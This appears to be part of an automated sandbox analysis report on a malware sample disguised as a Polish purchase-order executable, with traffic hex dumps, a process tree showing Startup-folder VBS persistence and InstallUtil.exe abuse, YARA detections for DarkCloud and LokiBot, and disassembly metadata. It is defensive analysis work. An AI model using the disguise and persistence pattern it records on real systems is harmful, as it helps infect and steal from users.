2024-10-24 11:40:25 UTC	16384	IN	Data Raw: b7 33 6f 0b b0 62 cb fa fe 3d e0 b6 bb dc a7 13 3c cf f8 86 a4 9f 3b e3 19 73 3f b9 9d 41 d7 e5 61 a3 14 2c a6 3c 7d 86 cf 98 25 10 2e 0e b7 c6 52 a3 d0 a5 d9 83 09 64 34 42 fe de 3c 3b 54 f7 2a 7f 02 22 72 3c 8e 55 e3 37 fc 2f 18 d3 dd 38 91 d7 c4 97 16 6a d6 b9 7e f8 f0 fe b7 76 ef c0 83 ee e6 74 27 73 48 80 76 0d 69 ed b2 5d e3 6b a2 84 2c 3f 77 d5 10 cd 27 ac 41 14 b3 78 c9 2b 57 93 58 44 11 17 04 f1 2b 41 d1 f0 88 37 34 3a 82 5d a1 4f b6 7d bf 83 35 cf a9 1a ab 2d 18 75 c6 20 82 e0 a7 18 91 b5 0c 5f f9 c9 15 ee 72 fc ab cf cc fe 8d 09 db 15 7e 87 d0 8f 50 1f b5 a4 58 74 4a ca cd 87 e0 da 0d 16 c3 f9 d8 91 c4 de 16 ce 9c 7a bd c7 47 93 8b 03 65 30 61 4d 0f 1f 32 59 0e ec 04 d9 c4 a9 39 40 ad c6 db 45 b9 25 f8 7c af 92 b5 16 7a c5 df c0 33 5a 4a d7 74 Data Ascii: 3ob=<;s?Aa,<}%.Rd4B<;T*"r<U7/8j~vt'sHvi]k,?w'Ax+WXD+A74:]O}5-u _r~PXtJzGe0aM2Y9@E%\|z3ZJt
2024-10-24 11:40:25 UTC	16384	IN	Data Raw: eb 4b 45 10 64 42 f8 88 9c f7 cf 27 aa 6e 07 de 78 83 67 ce b7 9a a6 0f bc e8 24 b5 f7 8d 07 14 f9 50 05 5f 3f 92 c2 a8 0f 9d 1a 91 0e 3a 65 8f 0e 2e ff 14 03 c4 8e 65 9b 6d 5c 22 cd f6 70 be 17 f9 98 c7 a8 28 04 e9 2e 22 28 22 6e 0e ed 10 35 8e c1 32 e7 cc c2 9b b8 8d f4 b6 c7 43 1d 05 5e fa 21 ea 27 e7 7c 50 6b 77 0b ea 79 70 6f 4b 43 74 a6 92 05 d0 83 a5 4f 17 82 ce f7 2f 4b 3e 42 17 ca 24 5e 1c b9 79 9a 9b 43 0f 6e 51 c0 c1 0b 02 c9 a6 43 36 be dc f9 84 39 81 91 63 07 b1 36 c2 36 6f 4d 90 94 25 9c fe 21 8d ed 65 a1 bc 12 de 55 d3 da ca db 7a 85 3d aa fa 94 2d c2 b8 c7 6b 72 63 96 57 d4 3a 29 5a 1b 70 2a 6b c8 29 bd 25 ac b7 1f 4e b7 2c dd 4a 31 be 37 a8 00 22 42 d4 b7 32 e1 33 03 5f 14 51 36 60 15 d9 fe d5 81 4e d6 51 83 19 5d 2c ae 9d b9 a4 70 e6 c0 Data Ascii: KEdB'nxg$P_?:e.em\"p(."("n52C^!'\|PkwypoKCtO/K>B$^yCnQC69c66oM%!eUz=-krcW:)Zp*k)%N,J17"B23_Q6`NQ],p
2024-10-24 11:40:25 UTC	16384	IN	Data Raw: da e3 84 1d a0 b7 65 81 df 86 13 ab 6e 17 89 3d 69 4e 11 0c d1 8b 83 a5 39 22 1d b9 6a 32 32 87 06 b2 d8 7a 1b ba 63 d9 78 7c 14 73 35 b5 ad fe 06 3e f3 86 f7 71 85 3c 1d a3 f2 0d 1b 65 04 df 21 3a c7 4c 9a 22 a0 20 cf 72 19 13 ec 5a e0 f2 99 cc b2 77 59 52 ba b4 47 d0 9b 00 f8 0f a5 c1 20 45 21 1a 17 4d 93 c8 19 00 1a cc 38 56 2c 8b 50 da e5 50 ed 58 48 81 de ca e0 f4 34 2d 53 12 d6 16 c3 5e a4 c8 80 29 c4 ca 40 79 da 32 5a b4 1a 54 94 23 5a 47 cc b4 72 7d 6f 6d bd 19 f4 42 52 5b 97 e3 00 83 82 10 a9 f8 ad 4a 5b 3a aa a0 78 05 15 74 aa 09 59 c5 05 7d 7e b2 07 86 91 3c 0d 1b 4a c8 e6 6b a6 3b 19 8d 2b c8 c1 d9 41 e0 81 67 d7 c8 c3 83 56 80 e8 46 5e 38 49 35 e2 15 6c 76 85 0c 79 6f 5a ed e2 34 d7 82 81 09 00 99 36 bb c5 26 fb 22 3a f4 2b a7 27 3e b9 30 57 Data Ascii: en=iN9"j22zcx\|s5>q<e!:L" rZwYRG E!M8V,PPXH4-S^)@y2ZT#ZGr}omBR[J[:xtY}~<Jk;+AgVF^8I5lvyoZ46&":+'>0W
2024-10-24 11:40:25 UTC	16384	IN	Data Raw: 4b 69 be da d6 17 3c c0 b1 11 aa 56 41 9a c9 3f fb c0 fe bf 3d 01 08 eb a0 db 73 c0 d9 36 2e dd 1d b2 33 60 bf 2b ef 09 4b b6 f1 ea 6d 38 2b 4c 7e 39 21 48 41 85 8b 67 23 de 4e 2b 65 7e d6 98 a5 91 15 16 5f 0a 80 d5 29 d7 ee 82 ce 26 55 21 7a 74 68 03 29 c5 11 c9 d9 b9 ff 8c cf c4 93 41 1f d7 03 7e fd c6 55 16 e2 be 13 a2 23 e7 7e 61 3b 77 24 4c 4e a2 94 8e 89 9d 0e cd 95 81 08 1e 60 23 a3 f3 f6 bd e7 e9 0c 51 7d a2 4a bd 4d 7c 0e 1a af de d1 c3 f8 20 06 8f 9a 02 bf fd 05 13 ab cd 26 b8 24 be 4b 31 39 5c 11 af 44 be b5 7a 23 b9 65 7f ef 49 98 6a 4b 1d bf bd e4 23 41 1a 34 76 81 51 3a 3c 67 da 61 30 a6 4e 06 06 8d 1b 96 f3 89 72 1a ba 19 32 9f 1c e5 0d 0a 22 53 3c 0e 1a 79 c4 3f 2e 54 32 30 61 26 e2 5e a3 de 32 d7 8f f2 0a 4b ff 64 c6 11 e4 70 34 53 f3 5e Data Ascii: Ki<VA?=s6.3`+Km8+L~9!HAg#N+e~_)&U!zth)A~U#~a;w$LN`#Q}JM\| &$K19\Dz#eIjK#A4vQ:<ga0Nr2"S<y?.T20a&^2Kdp4S^
2024-10-24 11:40:25 UTC	16384	IN	Data Raw: c3 76 3d bf 5b 5d d0 4e e7 a9 af a9 e9 71 ba 8e 6a b3 56 6a 38 ac d8 ec 08 b7 a3 1f 52 d1 82 ac ff f1 f9 09 b6 df a9 37 4d 51 7d 16 6e 38 f6 13 3e db c2 5c 90 b6 27 61 4c 92 97 47 9b 43 68 b3 82 44 66 f6 4d 74 c2 ec 0e 8d 3c 21 4f 25 ee ca 0c c8 74 21 5e 12 2c 88 72 3f a8 8b e0 ec e0 90 d7 e7 3c 2b 39 66 fd 01 f4 01 4e 5c af 8c 12 4a fd 05 e9 84 81 97 e5 0e 59 05 66 75 0e 3b e7 1a 28 c6 f2 83 54 c8 e7 6f 80 c9 ef 30 46 cd 3e cd 58 ae f4 fa 36 26 d8 86 c4 fe 47 cd ca f7 15 76 f3 e0 9f da c0 41 c6 96 21 22 f9 d0 1a bc 97 e0 bc 90 0d b1 3e ec f7 2d f9 e7 4c dd 72 7e 65 4a 8c ee fc 90 02 05 59 11 a3 67 fa 6a 92 eb 26 00 76 c3 b7 5f f7 fd b9 c9 c7 dc c0 3c 50 53 8c c2 c0 e6 35 39 91 50 31 ad 64 40 79 e3 30 85 63 2f 8b 32 b8 67 08 2f fe 10 92 6b 08 ae 3d e6 a5 Data Ascii: v=[]NqjVj8R7MQ}n8>\'aLGChDfMt<!O%t!^,r?<+9fN\JYfu;(To0F>X6&GvA!">-Lr~eJYgj&v_<PS59P1d@y0c/2g/k=
2024-10-24 11:40:25 UTC	16384	IN	Data Raw: 84 44 0a 62 71 39 b4 4e 44 53 e6 c8 d2 15 5b 75 60 9c 3f bd e9 8d cb 33 34 23 ea 47 aa 19 42 87 0d 72 85 b3 47 b9 5f 4f 25 32 64 7c 28 00 1d 12 ff ef 82 ed e9 ea 58 a9 5e 01 a7 f9 94 b5 ab e2 ce aa f4 60 c6 53 b0 2a 44 ee 28 89 19 25 e1 53 cd 37 ac 90 47 1d e5 cf cb 28 c6 36 84 14 44 6f c0 88 6d 02 1f db 68 ac b9 4a 56 f4 4a f0 eb 75 ab a7 77 f9 71 27 c2 05 ef ff f3 e6 0a 26 73 64 9d 4c 95 9b b1 63 e8 33 65 e3 27 b7 95 ff 2f 8f 8f d1 a8 ea ec 31 75 ac df 92 d7 90 1a a0 82 5a 70 fa 22 c5 18 a8 df bc 91 a4 69 63 56 7c 5c b3 fa 8c 26 a7 7a 44 08 83 1a 96 37 b6 c1 e4 c4 f2 bf 99 d8 23 18 f2 d8 a9 2a d4 64 a3 a2 f1 34 37 51 1c 4f 7c 8a 78 28 f8 b3 ae 2c 9c b7 97 4c 63 47 0f 60 55 56 50 d0 d5 6e 69 68 f8 dc 50 b6 f6 47 e7 c7 ae df a2 0b ed 03 c2 48 2c 6d 4a e9 Data Ascii: Dbq9NDS[u`?34#GBrG_O%2d\|(X^`SD(%S7G(6DomhJVJuwq'&sdLc3e'/1uZp"icV\|\&zD7#d47QO\|x(,LcG`UVPnihPGH,mJ
2024-10-24 11:40:25 UTC	16384	IN	Data Raw: 94 14 b5 f9 91 2a 6b 9c d9 3a 57 df 43 28 69 58 41 5f 56 e8 19 d3 37 b1 57 ec 01 63 cc 8e 4b 03 37 ec 88 8a df 4a d2 23 52 5c 90 f6 65 48 a2 c8 47 50 bb f1 da 50 34 45 f9 3d 40 e0 0c 2c 29 cb 58 73 57 19 e5 f5 11 89 4e f7 4e 0a a8 b2 da d8 b9 0c 64 c6 67 37 03 c5 2e 4e 06 1f 6d de 6c 3a ab 67 90 c3 7f a2 09 a8 97 47 c6 bb ea a7 c1 9f 61 5d c3 c5 ba 6b 9e 66 c5 4f 89 ab 1c 7d 20 2d bf 1a 84 bd dd 83 8f fe 0f 06 73 d4 13 20 39 14 78 fb 00 9c 72 bd 50 92 40 8c 0a 48 62 5c 8a 86 36 7b 61 11 59 0c 7f 32 77 81 37 3f e5 a9 b6 f7 ed 17 4c a5 6b 75 ce cd eb 94 87 88 41 44 45 51 61 2c bb 77 af 78 08 88 13 9d 88 1c 8e 3b 23 77 ce 24 2b 60 e4 be 91 c0 95 8c 8e c8 46 99 2e ec 4f bf 9a da a6 ae 0c f4 da f1 53 dd 8c 0d a5 98 7e 18 10 6e 66 f3 7b 19 3b 29 4b 77 89 f9 78 Data Ascii: *k:WC(iXA_V7WcK7J#R\eHGPP4E=@,)XsWNNdg7.Nml:gGa]kfO} -s 9xrP@Hb\6{aY2w7?LkuADEQa,wx;#w$+`F.OS~nf{;)Kwx
2024-10-24 11:40:25 UTC	217	IN	Data Raw: f9 46 a6 98 53 28 16 33 3a ad 6d 19 2c 7d ba 9a 95 23 6a 08 ef 79 1b 69 88 b1 e6 33 36 1f c4 c3 07 68 2d 05 d6 29 86 91 00 52 da d6 80 13 66 9e 48 59 1c ec f8 74 07 0f c2 8b 03 18 eb 8a 3f ea 21 de 95 ec 08 28 7e 9c 1c c6 86 7c 7c bc b8 e8 64 bb aa 95 cf ed 11 48 f0 ab 5c 26 a2 a9 27 0a 83 fd 87 29 b7 11 1d ef 92 6f a4 06 73 66 ab 16 c0 3c 65 93 95 fc fc 24 d0 3f fb 22 cd e5 6f 14 6c 46 79 63 a4 d4 52 a9 11 b9 b9 8f 80 68 a8 87 14 7e e8 f6 c5 17 55 98 bb da 9f 96 47 13 c7 91 21 b3 ae 8b 3f 6d d2 4e 43 8a 07 06 1f f2 3c 5c 82 22 c5 c9 bf c6 16 3c d7 e0 09 76 c2 c9 4e 0b 55 d9 9e f8 79 54 aa e8 8f cd bd ce 82 df c0 cd 9f f6 09 81 88 ea 56 b6 5b Data Ascii: FS(3:m,}#jyi36h-)RfHYt?!(~\|\|dH\&')osf<e$?"olFycRh~UG!?mNC<\"<vNUyTV[

Target ID:	0
Start time:	07:40:04
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe"
Imagebase:	0xc70000
File size:	19'456 bytes
MD5 hash:	934AB81BA50DCD526FEE8D8EFBB7A216
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2123637208.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:40:10
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x500000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:40:21
Start date:	24/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs"
Imagebase:	0x7ff6e2340000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:40:22
Start date:	24/10/2024
Path:	C:\Users\user\AppData\Roaming\FieldNames.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\FieldNames.exe"
Imagebase:	0xb70000
File size:	19'456 bytes
MD5 hash:	934AB81BA50DCD526FEE8D8EFBB7A216
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2306805654.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:40:27
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x770000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 015ECF30 Relevance: 8.5, Strings: 6, Instructions: 983COMMON

Download Yara Rule

Strings

e.OJ, xrefs: 015ED303
KD4, xrefs: 015ED317
xbmq, xrefs: 015ED05D
Tejq, xrefs: 015ED653
pnq, xrefs: 015EDAEA
TJoq, xrefs: 015ED0D2

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: KD4$TJoq$Tejq$e.OJ$pnq$xbmq
API String ID: 0-4070386389
Opcode ID: 121ba9983a1b23ce1f4c4c59f446462964f124d3cbf1c743af3404f57659ca23
Instruction ID: e71522bacbffbd7e06eabbc9f29aa61ae72c19e8a06429685db4df2d34e75d01
Opcode Fuzzy Hash: 121ba9983a1b23ce1f4c4c59f446462964f124d3cbf1c743af3404f57659ca23
Instruction Fuzzy Hash: 67A29275E00228CFDB65CF69C984A99BBB2FF89304F1581E9D509AB365DB319E81CF40

Function 015EE9B0 Relevance: 4.4, Strings: 3, Instructions: 691COMMON

Download Yara Rule

Strings

(_jq, xrefs: 015EF16B
$jq, xrefs: 015EEC7E
Pljq, xrefs: 015EEB98

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: (_jq$Pljq$$jq
API String ID: 0-1288743667
Opcode ID: 5bb5ca918749b2098b8c438e6f8f1e805c4ee10b465ac292a063c3e0fe75e0cc
Instruction ID: de1dbe3461feb7f68c0b8d3a548e783336ab2d2108f965dee431131a55f456fe
Opcode Fuzzy Hash: 5bb5ca918749b2098b8c438e6f8f1e805c4ee10b465ac292a063c3e0fe75e0cc
Instruction Fuzzy Hash: 4F424830B102098FDB19DF68C998A6E7BE6FF89310B1584AAE506CF3A5DB35DC41CB51

Function 015EF240 Relevance: 6.6, Strings: 5, Instructions: 344COMMON

Download Yara Rule

Strings

(nq, xrefs: 015EF354
(nq, xrefs: 015EF48E
(nq, xrefs: 015EF462
(nq, xrefs: 015EF589
(nq, xrefs: 015EF3AB

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: (nq$(nq$(nq$(nq$(nq
API String ID: 0-2914091151
Opcode ID: 1d5113192ac4336ca86f440ce6d7331a78a967cc2fc57a64999e7e518836bc06
Instruction ID: 64b605f67a755c73b5124cc545054a65ddb547d9e873f4f71f0d8372c51a4b8a
Opcode Fuzzy Hash: 1d5113192ac4336ca86f440ce6d7331a78a967cc2fc57a64999e7e518836bc06
Instruction Fuzzy Hash: 50B1DE327046558FDB18DF68E844AAE7BE6FFC8310B1580AAE905CB391CE39DC46C791

Function 05F842F6 Relevance: 5.0, Strings: 4, Instructions: 33COMMON

Download Yara Rule

Strings

, xrefs: 05F84329
H, xrefs: 05F840A0
., xrefs: 05F84303
), xrefs: 05F8423E

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: $)$.$H
API String ID: 0-2521929520
Opcode ID: b8ab053766c72de3224e957c0a8c57e56a1551bb1f79f91d1256e62d12f90db6
Instruction ID: 2e89f3add0bc4c7f56cea1dca475f1c68a73b7450e57e48ca16807a811a8d0be
Opcode Fuzzy Hash: b8ab053766c72de3224e957c0a8c57e56a1551bb1f79f91d1256e62d12f90db6
Instruction Fuzzy Hash: D301C274A00269CFDB64DF14D948BE9B7F5BB49304F4090EAC50EA7250CB749E89CF01

Function 05F8474C Relevance: 3.8, Strings: 3, Instructions: 47COMMON

Download Yara Rule

Strings

H, xrefs: 05F840A0
6, xrefs: 05F8520D
7, xrefs: 05F847E5

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: 6$7$H
API String ID: 0-1876449603
Opcode ID: f29c13e25069483461fb03209cef1851f31a67ff485a4643abc10a649530105c
Instruction ID: d4c3b2ffc02133337e2a06e848c81afdbaaebaebe01d1a74d70ac45a2d4fa860
Opcode Fuzzy Hash: f29c13e25069483461fb03209cef1851f31a67ff485a4643abc10a649530105c
Instruction Fuzzy Hash: 8C217B74905229CFDBA1DF28C988BA9BBB1AB09304F1081E9D54EA3290D6795EC59F40

Function 05F8482F Relevance: 3.8, Strings: 3, Instructions: 45COMMON

Download Yara Rule

Strings

(, xrefs: 05F848E0
H, xrefs: 05F840A0
#, xrefs: 05F8525D

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: #$($H
API String ID: 0-3500320252
Opcode ID: e7224fac92e556ab2e5e8f61e12496a3a921db73584f4aab2646029c358ab959
Instruction ID: c9e62ae27b505c3b5c072f7c680d1f39027340bcec7b94146dabdc5c8467e424
Opcode Fuzzy Hash: e7224fac92e556ab2e5e8f61e12496a3a921db73584f4aab2646029c358ab959
Instruction Fuzzy Hash: FB219E74900268DFDBA0DF58C948BEDBBB1EB49304F4084EAD90AA7390DB395E85CF41

Function 05F84C82 Relevance: 2.5, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

H, xrefs: 05F840A0
1, xrefs: 05F84CB2

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: 1$H
API String ID: 0-1393000113
Opcode ID: c7fe3200a006e308302230ceb4ca434ff1a51269afe9a9e1d07a5408b1745023
Instruction ID: ab5672fe6c4ff0c9b97aadd349a1ea683c8c8504186e2cd9dc58e2824f8b1260
Opcode Fuzzy Hash: c7fe3200a006e308302230ceb4ca434ff1a51269afe9a9e1d07a5408b1745023
Instruction Fuzzy Hash: 41117A74941229DBDBA5DF24DD44BEEBBB2BB08304F5045EAD50AA7290DB795E84CF00

Function 05F84BC6 Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

, xrefs: 05F851E7
H, xrefs: 05F840A0

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: $H
API String ID: 0-1323546614
Opcode ID: 3820398d83610bf7590b02fad532ebba7396a2cb6f44eabdcf61117d4d0520a7
Instruction ID: b048f8aa959ffd7b5a5161e46de387d5f8264921944a09b79296e1aa4fdd397b
Opcode Fuzzy Hash: 3820398d83610bf7590b02fad532ebba7396a2cb6f44eabdcf61117d4d0520a7
Instruction Fuzzy Hash: 6311AF71901229DFDB61CF14C948BEDBBB1BB09304F4080EADA0EA3251D73A5E85DF40

Function 015EE240 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

(_jq, xrefs: 015EE4CD

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: (_jq
API String ID: 0-2603807687
Opcode ID: eee84b94ac067859448b9da162e4353fa61781192e932ffd6c2d17c2215549ff
Instruction ID: 340417d97ee66c86f28b93d80604b522fa138c4c90d1c2082a644d96fcf62f88
Opcode Fuzzy Hash: eee84b94ac067859448b9da162e4353fa61781192e932ffd6c2d17c2215549ff
Instruction Fuzzy Hash: 61222875A10205DFDB08DFA8D495A6DBBF6FF88310F148069E906AB3A1EB75EC44CB50

Function 015E0A62 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

Tejq, xrefs: 015E0AFA

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: Tejq
API String ID: 0-2468842661
Opcode ID: 712401c332a6d88d43920bfdb2eae46e4c5665ca2459dd2be6d30c35237d26fb
Instruction ID: 44ef760cf7faf1c9dfc7af77979eaf30e44a5408d8c7c9c724e9463926fcae22
Opcode Fuzzy Hash: 712401c332a6d88d43920bfdb2eae46e4c5665ca2459dd2be6d30c35237d26fb
Instruction Fuzzy Hash: 7F316A30B00115CFCB48EF68D458A6D76EBBF89604B244869E406AF3E0CFB59C09CB45

Function 076FE220 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

P+9, xrefs: 076FE286

Memory Dump Source

Source File: 00000000.00000002.2124728087.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: P+9
API String ID: 0-2075859261
Opcode ID: ca244261432913fd1515f42db85d35b656af0b48c9facd911d0bf921d77b6ac1
Instruction ID: 2058f2e18e9141d8eeb1ff08f4876aec2b22a2aab83d60fa486edf9d37fb9810
Opcode Fuzzy Hash: ca244261432913fd1515f42db85d35b656af0b48c9facd911d0bf921d77b6ac1
Instruction Fuzzy Hash: 4C31EC70A01208DFEB58CF68D955BA97BF5FB49301F0085BAD90AA7361EB795E81CF10

Function 05F841E7 Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

), xrefs: 05F8423E

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 687eaf9a6cc40e5376e1ca1c1e3474ef4936310ac1aabf8ba0609009974ac748
Instruction ID: 86e8bbd0fd217903d8af2ba52a83e032964a6091697a3579a20a30a50056d811
Opcode Fuzzy Hash: 687eaf9a6cc40e5376e1ca1c1e3474ef4936310ac1aabf8ba0609009974ac748
Instruction Fuzzy Hash: 54F06274A04229DFCB64DF24DC94AD9B7F5BB89300F5081DA980EA7351DB35AE85CF41

Function 05F8416B Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

H, xrefs: 05F840A0

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 7a57fb86b01ddc7b96a5617a1b31e31d7be5442ae3994fa82d7e6f868cad5231
Instruction ID: f1e8ec2e2ef1c8a9f3cb9037067c78119b513732de6be03fb31637741c11431f
Opcode Fuzzy Hash: 7a57fb86b01ddc7b96a5617a1b31e31d7be5442ae3994fa82d7e6f868cad5231
Instruction Fuzzy Hash: 2DE0E539901128DFCF10CF10D988B98B7F1EB48304F1480DA840AA7290C7359F86CF00

Function 05F84E96 Relevance: 1.3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

2, xrefs: 05F84ECA

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: cb9c40d277264c8e339489e5c3dae384edb5121e60a9ae1a76f4316e81158955
Instruction ID: 77a9fb803fe1a572c45eecdfee76d164317906f3ff6910d13c4e927d3d3e6522
